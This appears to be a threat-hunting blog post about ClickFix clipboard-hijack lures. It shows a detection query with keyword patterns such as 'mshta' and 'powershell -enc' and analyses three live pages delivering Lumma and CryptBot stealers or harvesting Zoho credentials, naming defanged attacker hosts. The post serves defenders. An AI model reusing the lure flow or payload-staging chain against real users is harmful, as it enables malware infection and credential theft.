Identifying ClickFix Exploits: A Case Study in Proactive Threat Hunting

ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Often disguised as system alerts or CAPTCHA challenges, these web pages lure users into clicking a button-at which point a payload is silently staged for execution.

Both cybercriminals and advanced actors have adopted this technique to deploy a range of malware, most commonly information stealers delivered via mshta.exe, PowerShell, or embedded JavaScript.

Our research team used HuntSQL™ to proactively identify web infrastructure exhibiting traits associated with ClickFix delivery. Drawing from behavioral patterns observed in earlier reporting, we developed a custom query to track similar activity at scale across Hunt.io's dataset-ultimately uncovering multiple live domains serving malicious content yet to be publicly reported.

In the following sections, we break down the ClickFix technique, highlight real-world examples that surfaced as a result of our query, and examine how attackers are actively employing this method across the web.

Understanding the ClickFix Flow

In mid-2024, ClickFix emerged as a deceptive execution method that abused familiar UI elements to trick users into running malware under the guise of legitimate system prompts.

These lures often appear as 'Fix Now' and 'Bot Verification' messages, typically triggered by a click or JavaScript page load event.

Below is a breakdown of how the infection occurs:

• Step 1: The user is instructed to press Windows + R, which opens the native Run dialog on Windows.

• Step 2: Next, the site tells the user to press Ctrl + V, pasting a preloaded command silently copied to the clipboard via JavaScript.

• Step 3: Pressing Enter executes the payload. Depending on the variant, it often launches mshta.exe to retrieve and run a remote script or invokes PowerShell directly.

The entire interaction with the user is framed as a necessary system action, something we all encounter daily while surfing the internet.

Building Search Queries in Hunt.io

Hunt's approach to identifying ClickFix delivery domains centered on translating observable behaviors into structured, repeatable queries. Drawing on public reporting from Sekoia, Microsoft, and Proofpoint, we reviewed known webpages hosting the exploit and extracted a small set of recurring strings found in HTML and JavaScript used to stage payloads:

• 'Robot or Human'

• 'mshta'

• 'I am not a robot'

The three examples above represent a small, targeted set used for this blog. Defenders looking to start hunting immediately can expand on this approach by incorporating additional patterns such as 'Try Fix', 'reCAPTCHA Verification Id:', and 'powershell -enc'.

Users can adapt and experiment with different queries in HuntSQL™ to search across IPs, URLs, and hostnames through the SQL API or within the Crawler tab.

For this post, we've limited our results to scans with a timestamp of March 26th or later, capturing the most recent domains matching ClickFix activity.

Below is the query we came up with:

SELECT timestamp, ip, url, body
FROM crawler
WHERE timestamp.day gt '2025-03-26'
AND 

(

body LIKE '%Robot 

OR Human%' 

OR body LIKE '%mshta%' 

OR body LIKE '%I am not a robot'

)
GROUP BY
timestamp,
ip,
url,
body

Running the query across Hunt's Crawler dataset returned 10 results that matched the string patterns we identified earlier.

Looking at the domains in Figure 1, we see references to Microsoft 365, 'coins' (likely a reference to digital currencies), and another seeming to abuse Scaleway's Object storage service at s3.pl-waw[.]scw[.]cloud.

In the next section, we'll take a closer look at several of these web pages and the techniques used to deceive users and infect their systems.

Observed ClickFix Pages

Bitcoin-Themed Domain Poses as Cloudflare WAF to Deliver Lumma, CryptBot

The first site uncovered in our query, soubtcevent[.]com, presents a typical CAPTCHA-style verification page prompting users to prove they are not a robot. After clicking the button, a secondary prompt appears, mimicking a Cloudflare Web Application Firewall (WAF) check-asking the user to manually enter the word 'Cloudflare' into a system dialog box.

Once the string is entered, a Base64-encoded PowerShell script is run. Decoding the string reveals a second script hosted at tlgrm-redirect[.]icu/1.txt.

The second-stage code downloads three ZIP archives (1.zip, 2.zip, 3.zip) from mikropedik[.].in, and logs the success or failure of each attempt to tlgrmverif[.]cyou/log.php. When extracted:

• 1.zip and 2.zip each contain Windows Portable Executables: verify1.exe and verify2.exe.

• 3.zip includes verify3.exe alongside several DLLs.

At the time of analysis, verify1.exe was flagged as malicious by 39 of 73 vendors on VirusTotal. User comments suggest an association with the Lumma Stealer malware, and network activity includes callbacks to targett[.]top, a Telegram bot API endpoint, and meltmetu[.]live.

The malware also communicated with a Steam community profile page, likely to obtain URL paths for further infection of the target.

verify2.exe follows a similar network pattern, initiating communication with 94.181.203[.]38:4057/15bff393f6b17fef247/wwqkigwk.87r61. The endpoint closely mirrors the aforementioned Steam user profiles in Figure 4. Where these files differ is that this executable was linked to CryptBot malware.

As of the time of writing, verify3.exe returned a score of 0 and had no comments indicating it was connected to a malware family.

On Mar 18, 2025, soubtcevent[.]com was promoted on X by a Japanese-language account associated with a cryptocurrency project named SOU BTC.

Translating the text on the 18th from Japanese to English reads:

"Are you confident the market will bounce back quickly?

If you don't want to miss out on my top 100x chances, consider joining my private group.

Open for 1 hour. Best of luck."

It remains unclear whether the domain was compromised or if the individual promoting it is part of a cryptocurrency scam infecting users with information stealer malware. Regardless, users and defenders should be observant of prompts pretending to be associated with web application firewall software.

ClickFix Page Targets Zoho Office Suite Credentials

Unlike other attacks involving malware delivery, this example focuses on credential theft. The domain, timestesol[.]com, has the title 'Webmail Sign-in' and prompts for verification using the phrase 'I am not a robot,' which, if you remember, was one of our HuntSQL™ query keywords.

After interacting with the verification button, users are redirected to a login prompt branded with the Zoho header and a message indicating their session has expired, urging them to re-enter their username/password to continue.

Reviewing the webpage's source code reveals a hardcoded Telegram bot token, suggesting that once the users' email and password are entered, they are sent directly to an actor-controlled endpoint.

Rather than relying on malware execution, this variant leverages ClickFix tactics to guide users into submitting credentials-an arguably more discreet approach. As awareness of clipboard-based delivery increases, phishing adaptations like this may offer a lower-friction path for threat actors targeting enterprise platforms.

Compromised Website Abused to Deliver PowerShell

Our final example involves using compromised infrastructure to deliver a fileless PowerShell payload.

Clicking the verification prompt at https[:]//riverview-pools[.]com/verify/index.html copies a PowerShell command to the user's clipboard.

Visiting the script at http[:]//aatox[.]com/verify/45.ps1 reveals a Base64-encoded command that, once decoded, attempts to retrieve a second script (44.ps1) from a London-based website, which was likely compromised. As of this writing, the URL was inactive, suggesting the intrusion may have been remediated.

Together, these examples show how the ClickFix technique can be adapted for malware delivery, credential theft, and covert payload staging-often without relying on dedicated attacker infrastructure.

Final thoughts

ClickFix continues to gain traction as a low-friction method for delivering malware and harvesting credentials through deceptive browser-based prompts. By staging payloads in the clipboard and leaning on user interaction, it bypasses traditional download workflows and challenges conventional detection strategies.

In this post, we outlined how ClickFix is being used across a range of web-based delivery mechanisms-from clipboard-injected malware to credential harvesting and fileless payload staging. By focusing on the behavioral patterns of these pages, we were able to surface active infrastructure that may otherwise evade traditional detection pipelines.

Defender Recommendations

To reduce exposure to ClickFix-style delivery mechanisms, defenders should consider the following:

• Monitor for clipboard-based execution involving PowerShell, mshta.exe, or Base64-encoded commands-especially when preceded by suspicious browser activity.

• Alert on or block access to domains hosting verification-style lures that mimic CAPTCHA challenges or security checks.

• Ensure endpoint detection tools are deployed and configured to log PowerShell activity, script-based execution, and unusual clipboard use.

• Encourage users to enroll in multi-factor authentication (MFA) to mitigate the impact of potential credential harvesting campaigns.

ClickFix Network Observables and Indicators of Compromise (IOCs)

ClickFix Host Observables and Indicators of Compromise (IOCs)